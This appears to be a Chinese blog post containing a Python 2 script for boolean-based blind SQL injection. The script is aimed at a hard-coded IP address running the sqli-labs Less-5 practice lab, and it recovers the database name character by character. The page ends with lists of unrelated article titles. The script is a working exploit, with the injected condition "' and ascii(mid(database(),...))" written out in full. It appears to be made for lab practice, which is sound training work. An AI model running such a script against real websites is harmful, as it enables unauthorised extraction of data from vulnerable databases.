盲注脚本2.基于bool

 #!/usr/bin/env python

 #encoding:utf-8

 #by i3ekr

 #using

 #    python sqlinject.py -D "数据库名" -T "表明" -C "列明" --dump "列明"

 #

 import requests,re,os

 web = "http://139.199.179.167/sql-inject/sqli-labs/Less-5/index.php?id=1"

 payloads = list("abcdefghijklmnopqrstuvwxyz0123456789@_.")

 headers = {

     'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',

 }

 value = ''

 for i in xrange(1,15,1):

     for payload in payloads:

         url = web + "' and ascii(mid(database(),%d,1))=%d--+"%(i,ord(payload))

         html_doc = requests.get(url,params=headers,timeout=2).text

         if "You are" in html_doc:

             value += payload

             print "[+][%d] database name is:%s"%(i,payload)

             break

         else:

             pass

 print value

最新文章

  1. ActiveMQ消息队列的使用及应用
  2. UIView中间透明周围半透明(四种方法)
  3. java常用命令行指令
  4. dmesg 显示内核消息
  5. checkbox属性checked="checked"通过js已设置,但是不勾选
  6. Odoo 9 PDF不显示中文字体
  7. url 编码(percentcode 百分号编码)
  8. Linux中ifreq 结构体分析和使用 及其在项目中的简单应用
  9. 》》QQ-注册
  10. js作用域零碎的知识点,不同的script块,虽然同是全局变量
  11. python学习-python入门
  12. Python之关于量化投资实现代码--根据策略提出的代码--还未完善
  13. kudu记录-kudu原理
  14. Tomcat不同版本所对应的Servlet/JSP规范
  15. python 读取配置文件总是报错 configparser.NoSectionError: No section:
  16. UI5-文档-4.26-(Optional) Remote OData Service
  17. Fusioncharts的导出图片訪问官网问题
  18. 有關更新Java 至UPDATE 45 後出現沒法進入ORACLE EBS
  19. 20155320 2016-2017-2《Java程序设计》第十周学习总结
  20. hdu 1532 Drainage Ditches (最大流)

热门文章

  1. SpringBoot Web(SpringMVC)
  2. cookie的路径决定服务器在发送请求时候 是否决定发送 当路径匹配时候 则发送给服务器(默认发送原则)
  3. HDU 4869 Turn the pokers(思维+逆元)
  4. BZOJ 1221 软件开发(费用流)
  5. linux 服务器丢包故障排查
  6. CF997B Roman Digits
  7. CentOS 安装MariaDB
  8. POJ3468:A Simple Problem with Integers——题解
  9. BZOJ4651 & 洛谷1173 & UOJ220:[NOI2016]网格——题解(附debug数据)
  10. HDU4825:Xor Sum——题解